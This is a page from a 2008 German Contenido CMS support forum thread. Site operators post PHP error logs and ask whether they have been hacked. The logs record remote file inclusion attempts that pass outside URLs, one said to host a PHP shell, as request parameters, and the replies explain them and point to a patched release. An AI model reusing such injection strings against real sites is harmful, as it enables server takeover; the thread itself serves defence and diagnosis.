Seite 2 von 5
Verfasst: Mo 3. Mär 2008, 10:30
von tinof
Hallo,
ich jetzt auch: Ist das ein (erfolgreicher ??) Hackversuch ? :
Code: Alles auswählen
sgJEdMT0JBTFNbJ { .. ganz viel Buchstabensalat .. } Jzsg', '20080301223845')
[01-Mar-2008 22:38:45] /inhalt/cms/front_content.php?idcat=82&idart=96&xtc_catid=15 Session: freeze() failed.
[02-Mar-2008 12:35:02] /inhalt/cms/front_content.php?idcat=82&idart=96&xtc_catid=1 MySQL error 1062: Duplicate entry '622dfeb3a05a180131e528f7b3a95b9d' for key 1
insert into con_phplib_active_sessions ( sid, name, val, changed ) values ('622dfeb3a05a180131e528f7b3a95b9d', 'sid_1_1', 'c2lkXzFfMTokdG{ .. ganz viel Buchstabensalat .. } MCc7IA==', '20080302123501')
[02-Mar-2008 12:35:02] /inhalt/cms/front_content.php?idcat=82&idart=96&xtc_catid=1 Session: freeze() failed.
[02-Mar-2008 18:26:43] PHP Warning: parse_url(/inhalt/cms/front_content.php?idcatart=http://cherrygirl.h18.ru/images/cs.txt?) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse url in /usr/www/users/meinedomain/inhalt/cms/front_content.php(882) : eval()'d code on line 138
[02-Mar-2008 18:26:43] PHP Warning: parse_url(/inhalt/cms/front_content.php?idcatart=http://cherrygirl.h18.ru/images/cs.txt?) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse url in /usr/www/users/meinedomain/inhalt/cms/front_content.php(882) : eval()'d code on line 138
[02-Mar-2008 18:26:43] PHP Warning: parse_url(/inhalt/cms/front_content.php?idcatart=http://cherrygirl.h18.ru/images/cs.txt?) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse url in /usr/www/users/meinedomain/inhalt/cms/front_content.php(882) : eval()'d code on line 138
[02-Mar-2008 21:29:34] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /usr/www/users/meinedomain/inhalt/contenido/frm/crypt/cryptographp.fct.php on line 14
[02-Mar-2008 21:29:34] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /usr/www/users/meinedomain/inhalt/contenido/frm/crypt/cryptographp.fct.php:14) in /usr/www/users/meinedomain/inhalt/contenido/frm/crypt/cryptographp.fct.php on line 14
[02-Mar-2008 21:29:34] PHP Warning: Unknown(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in Unknown on line 0
[02-Mar-2008 21:29:34] PHP Warning: Unknown(): Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in Unknown on line 0
[03-Mar-2008 08:42:50] /inhalt/contenido/main.php?area=news&frame=4&contenido=ee3a254731a1515898d4025476c1c0fc MySQL error 1062: Duplicate entry 'ee3a254731a1515898d4025476c1c0fc' for key 1
insert into con_phplib_active_sessions ( sid, name, val, changed ) values ('ee3a254731a1515898d4025476c1c0fc', 'contenido', 'Y29udGVuaW{ .. ganz viel Buchstabensalat .. } JzMnOyA=', '20080303084249')
[03-Mar-2008 08:42:50] /inhalt/contenido/main.php?area=news&frame=4&contenido=ee3a254731a1515898d4025476c1c0fc Session: freeze() failed.
Contenio Version 4.6.23
Die Parameter xtc_xxxxx gehören zu einem Modul von uns und werden eigentlich per is__numeric() usw. gecheckt.
Das session_freeze() verunsichert mich etwas, aber auch das kann an unserem Modul liegen, dass sich von Zeit zu Zeit per hartem sess_register() etwas (an der Contenido - Session vorbei) merken möchte.
Richtig stutzig macht mich die komische URL.
Der Account ist heute sehr langsam, was auf ein Problem hindeuten würde, auf den ersten Blick sehe ich aber keine manipulierten Daten.
Was meint ihr ?
Danke schon mal im Vorauss.
P.S. wenn der erwähnte Modulcode hilfreich für die Diagnose sein könnte, bitte sagen.
Verfasst: Mo 3. Mär 2008, 13:46
von tinof
Ok,
ich denke, ich kann Entwarnung geben:
Das die Präsenz so langsam wurde, lag an den cronjobs.
Die Dateien, in denen Contenido den letzten Cron-Lauf vermerkt, waren irgendwie nicht beschreibbar. Deshalb wurden die Jobs alle bei jedem Seitenaufruf immer wieder ausgeführt, u.a. auch der schöne job 'optimize_database'.
Ich habe diese Dateien einfach mal gelöscht, jetzt hat sie der Server neu angelegt, so wie es ihm genehm ist, und nun klappt es wieder zügig.
Habe auch geprüft, was da alles aufgerufen wird und konnte keinen verfänglichen Code entdecken.
Trotzdem würde mich eine Expertenmeinung zu
Code: Alles auswählen
PHP Warning: parse_url(/inhalt/cms/front_content.php?idcatart=http://cherrygirl.h18.ru/images/cs.txt?) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse url in /usr/www/users/meinedomain/inhalt/cms/front_content.php(882) : eval()'d code on line 138
interessieren.
Danke und Grüße
Tino
Edit:
Ich sollte vielleicht noch hinzufügen, es geht um die Dateien
\contenido\cronjobs\*.job
Verfasst: Mo 3. Mär 2008, 17:32
von wosch
tinof hat geschrieben:Habe auch geprüft, was da alles aufgerufen wird und konnte keinen verfänglichen Code entdecken.
Code: Alles auswählen
PHP Warning: parse_url(/inhalt/cms/front_content.php?idcatart=http://cherrygirl.h18.ru/images/cs.txt?) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse url in /usr/www/users/meinedomain/inhalt/cms/front_content.php(882) : eval()'d code on line 138
Das war der Versuch einer Url-Injektion.
Über
h***://cherrygirl.h18.ru/images/cs.txt
sollte eine php-Schell auf deinem Server installiert werden.
Du hast einen IIS laufen, deswegen die etwas seltsame Fehlermeldung, es wurde mit einem Unix/Linus-Befehl, den der IIS nicht kennt, versucht die Datei vom ru-Server auf deinem Server auszuführen.
Das "Kirschenmädchen" ist mit der Masche seit Herbst 2007 im Internet unterwegs.
(Mittlerweile vom ru-Server gelöscht)
Verfasst: Mo 3. Mär 2008, 18:27
von tinof
Danke !
Verfasst: Fr 7. Mär 2008, 06:55
von tinof
Hallo, sorry, aber ich muss nochmals hier fragen:
eine andere Präsenz, hier Contenido 4.6.15:
Code: Alles auswählen
[03-Mar-2008 15:33:45] /cms/cms/front_content.php?idcat=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F connect({meinDBHost},{meinDBUser}, $Password) failed.
[03-Mar-2008 15:33:45] /cms/cms/front_content.php?idcat=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F next_record called with no query pending.
Ok, das ist wieder der Versuch einer URL - Injection. Was mich verunsichert ist, dass in der Fehlermeldung im Klartext meine Datenbankanmeldung auftaucht (bis auf $Passwort).
Ich möchte eigentlich 'nur' wissen:
- Diese Meldung kommt von Contenido selbst, und Contenido kennt natürlich die DB - Anmeldung, richtig ??
- Oder hat da jemand Anmeldedaten auslesen können?
Ansonsten keine Auffälligkeiten..
Danke nochmal
Tino
und wieder eine URL-Injektion
Verfasst: Mo 16. Jun 2008, 12:26
von Faar
heute Nacht hat es mich erwischt, URL-Injektion, mein Provider sperrte daraufhin meine Seite.
------
edit rbi:
bis zum bugfix wird die anleitung des exploits nicht angezeigt..
bugfix kommt.
-------
Mein Provider schrieb diese netten Zeilen dazu:
Ihr Account xxx.xx musste heute zu Ihrer Sicherheit gesperrt werden, da
Ihr Account gehackt wurde. Es liefen diverse verbotene Skripte bzw. es wurde massiv gespammt.
ohje...
Wo liegt das offene Scheunentor?
Re: und wieder eine URL-Injektion
Verfasst: Mo 16. Jun 2008, 12:44
von Halchteranerin
Faar hat geschrieben:Wo liegt das offene Scheunentor?
Sollen wir jetzt raten oder würfeln?
http://forum.contenido.org/viewtopic.php?p=70993#70993
Verfasst: Mo 16. Jun 2008, 14:52
von Faar
Wenn ich es genau wüsste, würde ich es ja posten
rbi hat scheinbar die Spur aufgenommen und ich hoffe, dass er das (oder die) Löcher stopfen kann.
Bis dahin will er nicht, dass genau Angaben gemacht werden
...und bis zu einer Lösung läuft nur meine alte html-Seite
Verfasst: Mo 16. Jun 2008, 15:20
von Halchteranerin
Du hast nicht mal die Contenido-Version gepostet.
Verfasst: Mo 16. Jun 2008, 15:27
von Faar
Version 4.6.23
Re: und wieder eine URL-Injektion
Verfasst: Mo 16. Jun 2008, 15:59
von Maribeauli
Es liegt genau da wo rbi editiert hat !!!
Ich habe den Originaltext noch gelesen, und nur mit dem Kopf geschüttelt.
Sowas darf nicht passieren (von einem Contenido-Entwickler !!!)
Eine kurze Suche gestern gab gleich ein paar Fundstellen, die interessanteste hier:
Wenn man den Link anklickt, landet man dort:
Gleich die erste Zeile, die mit den roten Punkten, ist der Versuch bei @faar.
Und in den folgenden 19 Zeilen (Im Bild sind nicht alle Zeilen enthalten sind jeweils weitere Hack-Möglichkeiten für Contenido 4.8.x
Verfasst: Mo 16. Jun 2008, 16:53
von Supporter
Mal 'ne doofe Frage, denn ich habe ja ohnehin keine Ahnung, aber lässt sich Contenido mittels .hta gegen diesen Scheiss eigentlich schützen?
Wer möchte denn schon freiwillig ein System das löchrig ist wie ein Schweizer Käse?
Session modifizieren mit SQL-Injection?
Verfasst: Mo 16. Jun 2008, 18:11
von Faar
Ich habe mal das Errorlog von einem anderen Projekt angeschaut und da waren sie heute Nacht auch und zuvor mal mit diesen hier:
/contenido/cms/front_content.php MySQL error 1062: Duplicate entry...
Da wurde versucht, in die Datenbank eine neue sid reinzuschreiben, quasi eine aktive Session zu erzeugen.
Schnelle Lösung?
Verfasst: Mo 16. Jun 2008, 19:13
von stsofd
Hallo,
da ich jetzt zum zweitenmal innerhalb von 72 Stunden einen Hack-Angriff erlebe, benötige ich eine schnelle vorübergehende Lösung, damit Angriff Nr. 3 evtl. verhindert werden kann.
Mein Provider hat mir schon wieder die ähnlichen Mails (wie ja anscheinend auch an
Faar) gesandt.
Ich möchte morgen nicht schon wieder manuell den ganzen Mist rausschmeißen müssen...
Gibt es eine vorrübergehende schnelle Lösung???
Verfasst: Mo 16. Jun 2008, 19:24
von holger.librenz_4fb
Es gibt eine endgülitge Lösung: Bitte auf die heute erschienene Version 4.8.5 aktualisieren!
So long,
Holger